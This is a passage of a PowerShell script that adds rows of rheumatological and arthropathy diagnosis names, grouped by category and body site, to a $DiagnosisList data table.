left hip") + $null = $DiagnosisList.Rows.Add("Arthritis due to other bacteria, hip","Arthritis due to other bacteria, unspecified hip") + $null = $DiagnosisList.Rows.Add("Arthritis due to other bacteria, knee","Arthritis due to other bacteria, right knee") + $null = $DiagnosisList.Rows.Add("Arthritis due to other bacteria, knee","Arthritis due to other bacteria, left knee") + $null = $DiagnosisList.Rows.Add("Arthritis due to other bacteria, knee","Arthritis due to other bacteria, unspecified knee") + $null = $DiagnosisList.Rows.Add("Arthritis due to other bacteria, ankle and foot","Arthritis due to other bacteria, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Arthritis due to other bacteria, ankle and foot","Arthritis due to other bacteria, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Arthritis due to other bacteria, ankle and foot","Arthritis due to other bacteria, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Arthritis due to other bacteria, vertebrae","Arthritis due to other bacteria, vertebrae") + $null = $DiagnosisList.Rows.Add("Polyarthritis due to other bacteria","Polyarthritis due to other bacteria") + $null = $DiagnosisList.Rows.Add("Pyogenic arthritis, unspecified","Pyogenic arthritis, unspecified") + $null = $DiagnosisList.Rows.Add("Direct infection of joint in infectious and parasitic diseases classified elsewhere","Direct infection of unspecified joint in infectious and parasitic diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Direct infection of shoulder joint in infectious and parasitic diseases classified elsewhere","Direct infection of right shoulder in infectious and parasitic diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Direct infection of shoulder joint in infectious and parasitic diseases classified elsewhere","Direct infection of left shoulder in infectious and parasitic diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Direct infection of shoulder joint in infectious and parasitic diseases classified elsewhere","Direct infection of unspecified shoulder in infectious and parasitic diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Direct infection of elbow in infectious and parasitic diseases classified elsewhere","Direct infection of right elbow in infectious and parasitic diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Direct infection of elbow in infectious and parasitic diseases classified elsewhere","Direct infection of left elbow in infectious and parasitic diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Direct infection of elbow in infectious and parasitic diseases classified elsewhere","Direct infection of unspecified elbow in infectious and parasitic diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Direct infection of wrist in infectious and parasitic diseases classified elsewhere","Direct infection of right wrist in infectious and parasitic diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Direct infection of wrist in infectious and parasitic diseases classified elsewhere","Direct infection of left wrist in infectious and parasitic diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Direct infection of wrist in infectious and parasitic diseases classified elsewhere","Direct infection of unspecified wrist in infectious and parasitic diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Direct infection of hand in infectious and parasitic diseases classified elsewhere","Direct infection of right hand in infectious and parasitic diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Direct infection of hand in infectious and parasitic diseases classified elsewhere","Direct infection of left hand in infectious and parasitic diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Direct infection of hand in infectious and parasitic diseases classified elsewhere","Direct infection of unspecified hand in infectious and parasitic diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Direct infection of hip in infectious and parasitic diseases classified elsewhere","Direct infection of right hip in infectious and parasitic diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Direct infection of hip in infectious and parasitic diseases classified elsewhere","Direct infection of left hip in infectious and parasitic diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Direct infection of hip in infectious and parasitic diseases classified elsewhere","Direct infection of unspecified hip in infectious and parasitic diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Direct infection of knee in infectious and parasitic diseases classified elsewhere","Direct infection of right knee in infectious and parasitic diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Direct infection of knee in infectious and parasitic diseases classified elsewhere","Direct infection of left knee in infectious and parasitic diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Direct infection of knee in infectious and parasitic diseases classified elsewhere","Direct infection of unspecified knee in infectious and parasitic diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Direct infection of ankle and foot in infectious and parasitic diseases classified elsewhere","Direct infection of right ankle and foot in infectious and parasitic diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Direct infection of ankle and foot in infectious and parasitic diseases classified elsewhere","Direct infection of left ankle and foot in infectious and parasitic diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Direct infection of ankle and foot in infectious and parasitic diseases classified elsewhere","Direct infection of unspecified ankle and foot in infectious and parasitic diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Direct infection of vertebrae in infectious and parasitic diseases classified elsewhere","Direct infection of vertebrae in infectious and parasitic diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Direct infection of multiple joints in infectious and parasitic diseases classified elsewhere","Direct infection of multiple joints in infectious and parasitic diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Arthropathy following intestinal bypass","Arthropathy following intestinal bypass, unspecified site") + $null = $DiagnosisList.Rows.Add("Arthropathy following intestinal bypass, shoulder","Arthropathy following intestinal bypass, right shoulder") + $null = $DiagnosisList.Rows.Add("Arthropathy following intestinal bypass, shoulder","Arthropathy following intestinal bypass, left shoulder") + $null = $DiagnosisList.Rows.Add("Arthropathy following intestinal bypass, shoulder","Arthropathy following intestinal bypass, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Arthropathy following intestinal bypass, elbow","Arthropathy following intestinal bypass, right elbow") + $null = $DiagnosisList.Rows.Add("Arthropathy following intestinal bypass, elbow","Arthropathy following intestinal bypass, left elbow") + $null = $DiagnosisList.Rows.Add("Arthropathy following intestinal bypass, elbow","Arthropathy following intestinal bypass, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Arthropathy following intestinal bypass, wrist","Arthropathy following intestinal bypass, right wrist") + $null = $DiagnosisList.Rows.Add("Arthropathy following intestinal bypass, wrist","Arthropathy following intestinal bypass, left wrist") + $null = $DiagnosisList.Rows.Add("Arthropathy following intestinal bypass, wrist","Arthropathy following intestinal bypass, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Arthropathy following intestinal bypass, hand","Arthropathy following intestinal bypass, right hand") + $null = $DiagnosisList.Rows.Add("Arthropathy following intestinal bypass, hand","Arthropathy following intestinal bypass, left hand") + $null = $DiagnosisList.Rows.Add("Arthropathy following intestinal bypass, hand","Arthropathy following intestinal bypass, unspecified hand") + $null = $DiagnosisList.Rows.Add("Arthropathy following intestinal bypass, hip","Arthropathy following intestinal bypass, right hip") + $null = $DiagnosisList.Rows.Add("Arthropathy following intestinal bypass, hip","Arthropathy following intestinal bypass, left hip") + $null = $DiagnosisList.Rows.Add("Arthropathy following intestinal bypass, hip","Arthropathy following intestinal bypass, unspecified hip") + $null = $DiagnosisList.Rows.Add("Arthropathy following intestinal bypass, knee","Arthropathy following intestinal bypass, right knee") + $null = $DiagnosisList.Rows.Add("Arthropathy following intestinal bypass, knee","Arthropathy following intestinal bypass, left knee") + $null = $DiagnosisList.Rows.Add("Arthropathy following intestinal bypass, knee","Arthropathy following intestinal bypass, unspecified knee") + $null = $DiagnosisList.Rows.Add("Arthropathy following intestinal bypass, ankle and foot","Arthropathy following intestinal bypass, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Arthropathy following intestinal bypass, ankle and foot","Arthropathy following intestinal bypass, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Arthropathy following intestinal bypass, ankle and foot","Arthropathy following intestinal bypass, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Arthropathy following intestinal bypass, vertebrae","Arthropathy following intestinal bypass, vertebrae") + $null = $DiagnosisList.Rows.Add("Arthropathy following intestinal bypass, multiple sites","Arthropathy following intestinal bypass, multiple sites") + $null = $DiagnosisList.Rows.Add("Postdysenteric arthropathy","Postdysenteric arthropathy, unspecified site") + $null = $DiagnosisList.Rows.Add("Postdysenteric arthropathy, shoulder","Postdysenteric arthropathy, right shoulder") + $null = $DiagnosisList.Rows.Add("Postdysenteric arthropathy, shoulder","Postdysenteric arthropathy, left shoulder") + $null = $DiagnosisList.Rows.Add("Postdysenteric arthropathy, shoulder","Postdysenteric arthropathy, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Postdysenteric arthropathy, elbow","Postdysenteric arthropathy, right elbow") + $null = $DiagnosisList.Rows.Add("Postdysenteric arthropathy, elbow","Postdysenteric arthropathy, left elbow") + $null = $DiagnosisList.Rows.Add("Postdysenteric arthropathy, elbow","Postdysenteric arthropathy, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Postdysenteric arthropathy, wrist","Postdysenteric arthropathy, right wrist") + $null = $DiagnosisList.Rows.Add("Postdysenteric arthropathy, wrist","Postdysenteric arthropathy, left wrist") + $null = $DiagnosisList.Rows.Add("Postdysenteric arthropathy, wrist","Postdysenteric arthropathy, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Postdysenteric arthropathy, hand","Postdysenteric arthropathy, right hand") + $null = $DiagnosisList.Rows.Add("Postdysenteric arthropathy, hand","Postdysenteric arthropathy, left hand") + $null = $DiagnosisList.Rows.Add("Postdysenteric arthropathy, hand","Postdysenteric arthropathy, unspecified hand") + $null = $DiagnosisList.Rows.Add("Postdysenteric arthropathy, hip","Postdysenteric arthropathy, right hip") + $null = $DiagnosisList.Rows.Add("Postdysenteric arthropathy, hip","Postdysenteric arthropathy, left hip") + $null = $DiagnosisList.Rows.Add("Postdysenteric arthropathy, hip","Postdysenteric arthropathy, unspecified hip") + $null = $DiagnosisList.Rows.Add("Postdysenteric arthropathy, knee","Postdysenteric arthropathy, right knee") + $null = $DiagnosisList.Rows.Add("Postdysenteric arthropathy, knee","Postdysenteric arthropathy, left knee") + $null = $DiagnosisList.Rows.Add("Postdysenteric arthropathy, knee","Postdysenteric arthropathy, unspecified knee") + $null = $DiagnosisList.Rows.Add("Postdysenteric arthropathy, ankle and foot","Postdysenteric arthropathy, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Postdysenteric arthropathy, ankle and foot","Postdysenteric arthropathy, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Postdysenteric arthropathy, ankle and foot","Postdysenteric arthropathy, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Postdysenteric arthropathy, vertebrae","Postdysenteric arthropathy, vertebrae") + $null = $DiagnosisList.Rows.Add("Postdysenteric arthropathy, multiple sites","Postdysenteric arthropathy, multiple sites") + $null = $DiagnosisList.Rows.Add("Postimmunization arthropathy","Postimmunization arthropathy, unspecified site") + $null = $DiagnosisList.Rows.Add("Postimmunization arthropathy, shoulder","Postimmunization arthropathy, right shoulder") + $null = $DiagnosisList.Rows.Add("Postimmunization arthropathy, shoulder","Postimmunization arthropathy, left shoulder") + $null = $DiagnosisList.Rows.Add("Postimmunization arthropathy, shoulder","Postimmunization arthropathy, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Postimmunization arthropathy, elbow","Postimmunization arthropathy, right elbow") + $null = $DiagnosisList.Rows.Add("Postimmunization arthropathy, elbow","Postimmunization arthropathy, left elbow") + $null = $DiagnosisList.Rows.Add("Postimmunization arthropathy, elbow","Postimmunization arthropathy, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Postimmunization arthropathy, wrist","Postimmunization arthropathy, right wrist") + $null = $DiagnosisList.Rows.Add("Postimmunization arthropathy, wrist","Postimmunization arthropathy, left wrist") + $null = $DiagnosisList.Rows.Add("Postimmunization arthropathy, wrist","Postimmunization arthropathy, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Postimmunization arthropathy, hand","Postimmunization arthropathy, right hand") + $null = $DiagnosisList.Rows.Add("Postimmunization arthropathy, hand","Postimmunization arthropathy, left hand") + $null = $DiagnosisList.Rows.Add("Postimmunization arthropathy, hand","Postimmunization arthropathy, unspecified hand") + $null = $DiagnosisList.Rows.Add("Postimmunization arthropathy, hip","Postimmunization arthropathy, right hip") + $null = $DiagnosisList.Rows.Add("Postimmunization arthropathy, hip","Postimmunization arthropathy, left hip") + $null = $DiagnosisList.Rows.Add("Postimmunization arthropathy, hip","Postimmunization arthropathy, unspecified hip") + $null = $DiagnosisList.Rows.Add("Postimmunization arthropathy, knee","Postimmunization arthropathy, right knee") + $null = $DiagnosisList.Rows.Add("Postimmunization arthropathy, knee","Postimmunization arthropathy, left knee") + $null = $DiagnosisList.Rows.Add("Postimmunization arthropathy, knee","Postimmunization arthropathy, unspecified knee") + $null = $DiagnosisList.Rows.Add("Postimmunization arthropathy, ankle and foot","Postimmunization arthropathy, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Postimmunization arthropathy, ankle and foot","Postimmunization arthropathy, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Postimmunization arthropathy, ankle and foot","Postimmunization arthropathy, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Postimmunization arthropathy, vertebrae","Postimmunization arthropathy, vertebrae") + $null = $DiagnosisList.Rows.Add("Postimmunization arthropathy, multiple sites","Postimmunization arthropathy, multiple sites") + $null = $DiagnosisList.Rows.Add("Reiter's disease","Reiter's disease, unspecified site") + $null = $DiagnosisList.Rows.Add("Reiter's disease, shoulder","Reiter's disease, right shoulder") + $null = $DiagnosisList.Rows.Add("Reiter's disease, shoulder","Reiter's disease, left shoulder") + $null = $DiagnosisList.Rows.Add("Reiter's disease, shoulder","Reiter's disease, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Reiter's disease, elbow","Reiter's disease, right elbow") + $null = $DiagnosisList.Rows.Add("Reiter's disease, elbow","Reiter's disease, left elbow") + $null = $DiagnosisList.Rows.Add("Reiter's disease, elbow","Reiter's disease, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Reiter's disease, wrist","Reiter's disease, right wrist") + $null = $DiagnosisList.Rows.Add("Reiter's disease, wrist","Reiter's disease, left wrist") + $null = $DiagnosisList.Rows.Add("Reiter's disease, wrist","Reiter's disease, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Reiter's disease, hand","Reiter's disease, right hand") + $null = $DiagnosisList.Rows.Add("Reiter's disease, hand","Reiter's disease, left hand") + $null = $DiagnosisList.Rows.Add("Reiter's disease, hand","Reiter's disease, unspecified hand") + $null = $DiagnosisList.Rows.Add("Reiter's disease, hip","Reiter's disease, right hip") + $null = $DiagnosisList.Rows.Add("Reiter's disease, hip","Reiter's disease, left hip") + $null = $DiagnosisList.Rows.Add("Reiter's disease, hip","Reiter's disease, unspecified hip") + $null = $DiagnosisList.Rows.Add("Reiter's disease, knee","Reiter's disease, right knee") + $null = $DiagnosisList.Rows.Add("Reiter's disease, knee","Reiter's disease, left knee") + $null = $DiagnosisList.Rows.Add("Reiter's disease, knee","Reiter's disease, unspecified knee") + $null = $DiagnosisList.Rows.Add("Reiter's disease, ankle and foot","Reiter's disease, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Reiter's disease, ankle and foot","Reiter's disease, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Reiter's disease, ankle and foot","Reiter's disease, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Reiter's disease, vertebrae","Reiter's disease, vertebrae") + $null = $DiagnosisList.Rows.Add("Reiter's disease, multiple sites","Reiter's disease, multiple sites") + $null = $DiagnosisList.Rows.Add("Other reactive arthropathies","Other reactive arthropathies, unspecified site") + $null = $DiagnosisList.Rows.Add("Other reactive arthropathies, shoulder","Other reactive arthropathies, right shoulder") + $null = $DiagnosisList.Rows.Add("Other reactive arthropathies, shoulder","Other reactive arthropathies, left shoulder") + $null = $DiagnosisList.Rows.Add("Other reactive arthropathies, shoulder","Other reactive arthropathies, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other reactive arthropathies, elbow","Other reactive arthropathies, right elbow") + $null = $DiagnosisList.Rows.Add("Other reactive arthropathies, elbow","Other reactive arthropathies, left elbow") + $null = $DiagnosisList.Rows.Add("Other reactive arthropathies, elbow","Other reactive arthropathies, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Other reactive arthropathies, wrist","Other reactive arthropathies, right wrist") + $null = $DiagnosisList.Rows.Add("Other reactive arthropathies, wrist","Other reactive arthropathies, left wrist") + $null = $DiagnosisList.Rows.Add("Other reactive arthropathies, wrist","Other reactive arthropathies, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Other reactive arthropathies, hand","Other reactive arthropathies, right hand") + $null = $DiagnosisList.Rows.Add("Other reactive arthropathies, hand","Other reactive arthropathies, left hand") + $null = $DiagnosisList.Rows.Add("Other reactive arthropathies, hand","Other reactive arthropathies, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other reactive arthropathies, hip","Other reactive arthropathies, right hip") + $null = $DiagnosisList.Rows.Add("Other reactive arthropathies, hip","Other reactive arthropathies, left hip") + $null = $DiagnosisList.Rows.Add("Other reactive arthropathies, hip","Other reactive arthropathies, unspecified hip") + $null = $DiagnosisList.Rows.Add("Other reactive arthropathies, knee","Other reactive arthropathies, right knee") + $null = $DiagnosisList.Rows.Add("Other reactive arthropathies, knee","Other reactive arthropathies, left knee") + $null = $DiagnosisList.Rows.Add("Other reactive arthropathies, knee","Other reactive arthropathies, unspecified knee") + $null = $DiagnosisList.Rows.Add("Other reactive arthropathies, ankle and foot","Other reactive arthropathies, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Other reactive arthropathies, ankle and foot","Other reactive arthropathies, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Other reactive arthropathies, ankle and foot","Other reactive arthropathies, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Other reactive arthropathies, vertebrae","Other reactive arthropathies, vertebrae") + $null = $DiagnosisList.Rows.Add("Other reactive arthropathies, multiple sites","Other reactive arthropathies, multiple sites") + $null = $DiagnosisList.Rows.Add("Reactive arthropathy, unspecified","Reactive arthropathy, unspecified") + $null = $DiagnosisList.Rows.Add("Autoinflammatory syndromes","Periodic fever syndromes") + $null = $DiagnosisList.Rows.Add("Autoinflammatory syndromes","Cryopyrin-associated periodic syndromes") + $null = $DiagnosisList.Rows.Add("Autoinflammatory syndromes","Other autoinflammatory syndromes") + $null = $DiagnosisList.Rows.Add("Autoinflammatory syndromes","Autoinflammatory syndrome, unspecified") + $null = $DiagnosisList.Rows.Add("Felty's syndrome","Felty's syndrome, unspecified site") + $null = $DiagnosisList.Rows.Add("Felty's syndrome, shoulder","Felty's syndrome, right shoulder") + $null = $DiagnosisList.Rows.Add("Felty's syndrome, shoulder","Felty's syndrome, left shoulder") + $null = $DiagnosisList.Rows.Add("Felty's syndrome, shoulder","Felty's syndrome, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Felty's syndrome, elbow","Felty's syndrome, right elbow") + $null = $DiagnosisList.Rows.Add("Felty's syndrome, elbow","Felty's syndrome, left elbow") + $null = $DiagnosisList.Rows.Add("Felty's syndrome, elbow","Felty's syndrome, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Felty's syndrome, wrist","Felty's syndrome, right wrist") + $null = $DiagnosisList.Rows.Add("Felty's syndrome, wrist","Felty's syndrome, left wrist") + $null = $DiagnosisList.Rows.Add("Felty's syndrome, wrist","Felty's syndrome, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Felty's syndrome, hand","Felty's syndrome, right hand") + $null = $DiagnosisList.Rows.Add("Felty's syndrome, hand","Felty's syndrome, left hand") + $null = $DiagnosisList.Rows.Add("Felty's syndrome, hand","Felty's syndrome, unspecified hand") + $null = $DiagnosisList.Rows.Add("Felty's syndrome, hip","Felty's syndrome, right hip") + $null = $DiagnosisList.Rows.Add("Felty's syndrome, hip","Felty's syndrome, left hip") + $null = $DiagnosisList.Rows.Add("Felty's syndrome, hip","Felty's syndrome, unspecified hip") + $null = $DiagnosisList.Rows.Add("Felty's syndrome, knee","Felty's syndrome, right knee") + $null = $DiagnosisList.Rows.Add("Felty's syndrome, knee","Felty's syndrome, left knee") + $null = $DiagnosisList.Rows.Add("Felty's syndrome, knee","Felty's syndrome, unspecified knee") + $null = $DiagnosisList.Rows.Add("Felty's syndrome, ankle and foot","Felty's syndrome, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Felty's syndrome, ankle and foot","Felty's syndrome, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Felty's syndrome, ankle and foot","Felty's syndrome, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Felty's syndrome, multiple sites","Felty's syndrome, multiple sites") + $null = $DiagnosisList.Rows.Add("Rheumatoid lung disease with rheumatoid arthritis","Rheumatoid lung disease with rheumatoid arthritis of unspecified site") + $null = $DiagnosisList.Rows.Add("Rheumatoid lung disease with rheumatoid arthritis of shoulder","Rheumatoid lung disease with rheumatoid arthritis of right shoulder") + $null = $DiagnosisList.Rows.Add("Rheumatoid lung disease with rheumatoid arthritis of shoulder","Rheumatoid lung disease with rheumatoid arthritis of left shoulder") + $null = $DiagnosisList.Rows.Add("Rheumatoid lung disease with rheumatoid arthritis of shoulder","Rheumatoid lung disease with rheumatoid arthritis of unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Rheumatoid lung disease with rheumatoid arthritis of elbow","Rheumatoid lung disease with rheumatoid arthritis of right elbow") + $null = $DiagnosisList.Rows.Add("Rheumatoid lung disease with rheumatoid arthritis of elbow","Rheumatoid lung disease with rheumatoid arthritis of left elbow") + $null = $DiagnosisList.Rows.Add("Rheumatoid lung disease with rheumatoid arthritis of elbow","Rheumatoid lung disease with rheumatoid arthritis of unspecified elbow") + $null = $DiagnosisList.Rows.Add("Rheumatoid lung disease with rheumatoid arthritis of wrist","Rheumatoid lung disease with rheumatoid arthritis of right wrist") + $null = $DiagnosisList.Rows.Add("Rheumatoid lung disease with rheumatoid arthritis of wrist","Rheumatoid lung disease with rheumatoid arthritis of left wrist") + $null = $DiagnosisList.Rows.Add("Rheumatoid lung disease with rheumatoid arthritis of wrist","Rheumatoid lung disease with rheumatoid arthritis of unspecified wrist") + $null = $DiagnosisList.Rows.Add("Rheumatoid lung disease with rheumatoid arthritis of hand","Rheumatoid lung disease with rheumatoid arthritis of right hand") + $null = $DiagnosisList.Rows.Add("Rheumatoid lung disease with rheumatoid arthritis of hand","Rheumatoid lung disease with rheumatoid arthritis of left hand") + $null = $DiagnosisList.Rows.Add("Rheumatoid lung disease with rheumatoid arthritis of hand","Rheumatoid lung disease with rheumatoid arthritis of unspecified hand") + $null = $DiagnosisList.Rows.Add("Rheumatoid lung disease with rheumatoid arthritis of hip","Rheumatoid lung disease with rheumatoid arthritis of right hip") + $null = $DiagnosisList.Rows.Add("Rheumatoid lung disease with rheumatoid arthritis of hip","Rheumatoid lung disease with rheumatoid arthritis of left hip") + $null = $DiagnosisList.Rows.Add("Rheumatoid lung disease with rheumatoid arthritis of hip","Rheumatoid lung disease with rheumatoid arthritis of unspecified hip") + $null = $DiagnosisList.Rows.Add("Rheumatoid lung disease with rheumatoid arthritis of knee","Rheumatoid lung disease with rheumatoid arthritis of right knee") + $null = $DiagnosisList.Rows.Add("Rheumatoid lung disease with rheumatoid arthritis of knee","Rheumatoid lung disease with rheumatoid arthritis of left knee") + $null = $DiagnosisList.Rows.Add("Rheumatoid lung disease with rheumatoid arthritis of knee","Rheumatoid lung disease with rheumatoid arthritis of unspecified knee") + $null = $DiagnosisList.Rows.Add("Rheumatoid lung disease with rheumatoid arthritis of ankle and foot","Rheumatoid lung disease with rheumatoid arthritis of right ankle and foot") + $null = $DiagnosisList.Rows.Add("Rheumatoid lung disease with rheumatoid arthritis of ankle and foot","Rheumatoid lung disease with rheumatoid arthritis of left ankle and foot") + $null = $DiagnosisList.Rows.Add("Rheumatoid lung disease with rheumatoid arthritis of ankle and foot","Rheumatoid lung disease with rheumatoid arthritis of unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Rheumatoid lung disease with rheumatoid arthritis of multiple sites","Rheumatoid lung disease with rheumatoid arthritis of multiple sites") + $null = $DiagnosisList.Rows.Add("Rheumatoid vasculitis with rheumatoid arthritis","Rheumatoid vasculitis with rheumatoid arthritis of unspecified site") + $null = $DiagnosisList.Rows.Add("Rheumatoid vasculitis with rheumatoid arthritis of shoulder","Rheumatoid vasculitis with rheumatoid arthritis of right shoulder") + $null = $DiagnosisList.Rows.Add("Rheumatoid vasculitis with rheumatoid arthritis of shoulder","Rheumatoid vasculitis with rheumatoid arthritis of left shoulder") + $null = $DiagnosisList.Rows.Add("Rheumatoid vasculitis with rheumatoid arthritis of shoulder","Rheumatoid vasculitis with rheumatoid arthritis of unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Rheumatoid vasculitis with rheumatoid arthritis of elbow","Rheumatoid vasculitis with rheumatoid arthritis of right elbow") + $null = $DiagnosisList.Rows.Add("Rheumatoid vasculitis with rheumatoid arthritis of elbow","Rheumatoid vasculitis with rheumatoid arthritis of left elbow") + $null = $DiagnosisList.Rows.Add("Rheumatoid vasculitis with rheumatoid arthritis of elbow","Rheumatoid vasculitis with rheumatoid arthritis of unspecified elbow") + $null = $DiagnosisList.Rows.Add("Rheumatoid vasculitis with rheumatoid arthritis of wrist","Rheumatoid vasculitis with rheumatoid arthritis of right wrist") + $null = $DiagnosisList.Rows.Add("Rheumatoid vasculitis with rheumatoid arthritis of wrist","Rheumatoid vasculitis with rheumatoid arthritis of left wrist") + $null = $DiagnosisList.Rows.Add("Rheumatoid vasculitis with rheumatoid arthritis of wrist","Rheumatoid vasculitis with rheumatoid arthritis of unspecified wrist") + $null = $DiagnosisList.Rows.Add("Rheumatoid vasculitis with rheumatoid arthritis of hand","Rheumatoid vasculitis with rheumatoid arthritis of right hand") + $null = $DiagnosisList.Rows.Add("Rheumatoid vasculitis with rheumatoid arthritis of hand","Rheumatoid vasculitis with rheumatoid arthritis of left hand") + $null = $DiagnosisList.Rows.Add("Rheumatoid vasculitis with rheumatoid arthritis of hand","Rheumatoid vasculitis with rheumatoid arthritis of unspecified hand") + $null = $DiagnosisList.Rows.Add("Rheumatoid vasculitis with rheumatoid arthritis of hip","Rheumatoid vasculitis with rheumatoid arthritis of right hip") + $null = $DiagnosisList.Rows.Add("Rheumatoid vasculitis with rheumatoid arthritis of hip","Rheumatoid vasculitis with rheumatoid arthritis of left hip") + $null = $DiagnosisList.Rows.Add("Rheumatoid vasculitis with rheumatoid arthritis of hip","Rheumatoid vasculitis with rheumatoid arthritis of unspecified hip") + $null = $DiagnosisList.Rows.Add("Rheumatoid vasculitis with rheumatoid arthritis of knee","Rheumatoid vasculitis with rheumatoid arthritis of right knee") + $null = $DiagnosisList.Rows.Add("Rheumatoid vasculitis with rheumatoid arthritis of knee","Rheumatoid vasculitis with rheumatoid arthritis of left knee") + $null = $DiagnosisList.Rows.Add("Rheumatoid vasculitis with rheumatoid arthritis of knee","Rheumatoid vasculitis with rheumatoid arthritis of unspecified knee") + $null = $DiagnosisList.Rows.Add("Rheumatoid vasculitis with rheumatoid arthritis of ankle and foot","Rheumatoid vasculitis with rheumatoid arthritis of right ankle and foot") + $null = $DiagnosisList.Rows.Add("Rheumatoid vasculitis with rheumatoid arthritis of ankle and foot","Rheumatoid vasculitis with rheumatoid arthritis of left ankle and foot") + $null = $DiagnosisList.Rows.Add("Rheumatoid vasculitis with rheumatoid arthritis of ankle and foot","Rheumatoid vasculitis with rheumatoid arthritis of unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Rheumatoid vasculitis with rheumatoid arthritis of multiple sites","Rheumatoid vasculitis with rheumatoid arthritis of multiple sites") + $null = $DiagnosisList.Rows.Add("Rheumatoid heart disease with rheumatoid arthritis","Rheumatoid heart disease with rheumatoid arthritis of unspecified site") + $null = $DiagnosisList.Rows.Add("Rheumatoid heart disease with rheumatoid arthritis of shoulder","Rheumatoid heart disease with rheumatoid arthritis of right shoulder") + $null = $DiagnosisList.Rows.Add("Rheumatoid heart disease with rheumatoid arthritis of shoulder","Rheumatoid heart disease with rheumatoid arthritis of left shoulder") + $null = $DiagnosisList.Rows.Add("Rheumatoid heart disease with rheumatoid arthritis of shoulder","Rheumatoid heart disease with rheumatoid arthritis of unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Rheumatoid heart disease with rheumatoid arthritis of elbow","Rheumatoid heart disease with rheumatoid arthritis of right elbow") + $null = $DiagnosisList.Rows.Add("Rheumatoid heart disease with rheumatoid arthritis of elbow","Rheumatoid heart disease with rheumatoid arthritis of left elbow") + $null = $DiagnosisList.Rows.Add("Rheumatoid heart disease with rheumatoid arthritis of elbow","Rheumatoid heart disease with rheumatoid arthritis of unspecified elbow") + $null = $DiagnosisList.Rows.Add("Rheumatoid heart disease with rheumatoid arthritis of wrist","Rheumatoid heart disease with rheumatoid arthritis of right wrist") + $null = $DiagnosisList.Rows.Add("Rheumatoid heart disease with rheumatoid arthritis of wrist","Rheumatoid heart disease with rheumatoid arthritis of left wrist") + $null = $DiagnosisList.Rows.Add("Rheumatoid heart disease with rheumatoid arthritis of wrist","Rheumatoid heart disease with rheumatoid arthritis of unspecified wrist") + $null = $DiagnosisList.Rows.Add("Rheumatoid heart disease with rheumatoid arthritis of hand","Rheumatoid heart disease with rheumatoid arthritis of right hand") + $null = $DiagnosisList.Rows.Add("Rheumatoid heart disease with rheumatoid arthritis of hand","Rheumatoid heart disease with rheumatoid arthritis of left hand") + $null = $DiagnosisList.Rows.Add("Rheumatoid heart disease with rheumatoid arthritis of hand","Rheumatoid heart disease with rheumatoid arthritis of unspecified hand") + $null = $DiagnosisList.Rows.Add("Rheumatoid heart disease with rheumatoid arthritis of hip","Rheumatoid heart disease with rheumatoid arthritis of right hip") + $null = $DiagnosisList.Rows.Add("Rheumatoid heart disease with rheumatoid arthritis of hip","Rheumatoid heart disease with rheumatoid arthritis of left hip") + 